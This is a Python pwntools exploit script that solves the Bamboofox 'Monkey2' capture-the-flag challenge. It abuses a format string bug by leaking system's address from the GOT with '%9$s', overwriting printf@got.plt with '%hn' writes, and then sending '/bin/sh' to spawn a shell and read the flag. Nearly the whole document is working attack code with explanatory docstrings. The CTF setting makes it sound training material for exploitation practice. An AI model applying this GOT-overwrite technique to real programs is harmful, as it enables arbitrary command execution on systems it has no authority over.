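# -*- coding: utf-8 -*-
"""Bamboofox/train/Monkey2 [100]

tags: CTF, PWN, Bamboofox
Challenge files: http://gofile.me/6lhQ2/oyjNcN1Tw

The binary passes a user-controlled string to printf (menu option 2), and its
GOT holds entries for both system and printf.  The plan:

  1. leak system's resolved address out of system@got.plt with "%9$s";
  2. write that address over printf@got.plt with two "%hn" stores;
  3. call printf("/bin/sh"), which from then on runs system("/bin/sh").

  system@got.plt = 0x804a028
  printf@got.plt = 0x804a00c

NOTE(review): this assumes the menu prompts are not themselves emitted through
printf; if they were, program() would hang after the GOT overwrite.  The
original run against the remote service succeeded, so that seems to hold.
"""
from pwn import *

context.arch = 'i386'

LOCAL = False       # attack ./monkey locally instead of the remote service
DEBUG = False       # pwntools debug logging (every byte on the wire)
ATTACH_GDB = False  # attach gdb to the local process

SYSTEM_GOT = 0x804a028  # where the leak reads from
PRINTF_GOT = 0x804a00c  # what the write overwrites
# Positional printf argument that aliases the first 4 bytes of our buffer on
# the stack: "%7$n" hits bytes 0-3, "%8$n" bytes 4-7, "%9$s" bytes 8-11.
FMT_ARG_BASE = 7

if DEBUG:
    context.log_level = "debug"

if LOCAL:
    cn = process('./monkey')
    elf = ELF('./monkey')
    if ATTACH_GDB:
        gdb.attach(cn)
else:
    cn = remote('bamboofox.cs.nctu.edu.tw', 11000)


def program(text):
    """Choose menu option 2 and hand *text* to the binary's printf call."""
    cn.recvuntil(b"choice!\n")
    cn.sendline(b"2")
    cn.recvuntil(b"out.\n")
    cn.sendline(text)


def fmt_write32(target, value, arg_base=FMT_ARG_BASE):
    """Build a format string that stores the 32-bit *value* at *target*.

    The payload opens with the two target addresses (target, target + 2), which
    land at positional arguments arg_base and arg_base + 1, so the byte counter
    already stands at 8 when the first width is applied.  The two 16-bit halves
    are stored with "%hn" in ascending order of value, so every padding width
    is non-negative and below 0x10000.  "%hn" stores exactly two bytes; the
    original "%n" stored four, which also zeroed the two bytes at target + 4
    (the low half of the neighbouring GOT slot).

    All arithmetic is integer arithmetic: the original used "/" under
    Python 3, which produced a float and put "NNNN.0" into the width field.

    Returns the payload as bytes.
    """
    halves = [
        (value & 0xffff, arg_base),          # low half  -> target
        ((value >> 16) & 0xffff, arg_base + 1),  # high half -> target + 2
    ]
    payload = p32(target) + p32(target + 2)
    printed = len(payload)
    for half, idx in sorted(halves):
        pad = (half - printed) % 0x10000  # %hn only sees the count mod 2**16
        if pad:
            payload += b"%" + str(pad).encode() + b"c"
        payload += b"%" + str(idx).encode() + b"$hn"
        printed += pad
    return payload


def leak_system():
    """Read system's resolved address out of its GOT slot with "%9$s".

    Payload layout: "aaaa%9$s" occupies positional args 7 and 8, and the
    appended address is arg 9, so "%9$s" dereferences SYSTEM_GOT.  The binary
    echoes the formatted string, so the four bytes right after "aaaa" are the
    pointer.

    Raises (via log.error) when the echo is too short, which happens when the
    pointer contains a newline or NUL byte; a retry beats a bogus address.
    """
    program(b"aaaa%9$s" + p32(SYSTEM_GOT))
    echoed = cn.recvuntil(b"\n")
    if len(echoed) < 8:
        log.error("short leak %r - pointer probably contains 0x0a or 0x00"
                  % (echoed,))
    return u32(echoed[4:8])


system_addr = leak_system()
log.info("system @ %#x" % system_addr)
# printf@got.plt := system.  This write itself still runs through the real
# printf, because the call was dispatched before the slot changed.
program(fmt_write32(PRINTF_GOT, system_addr))
# From here on every printf(s) is system(s).
program(b"/bin/sh")
cn.sendline(b"cat /home/ctf/flag")
cn.interactive()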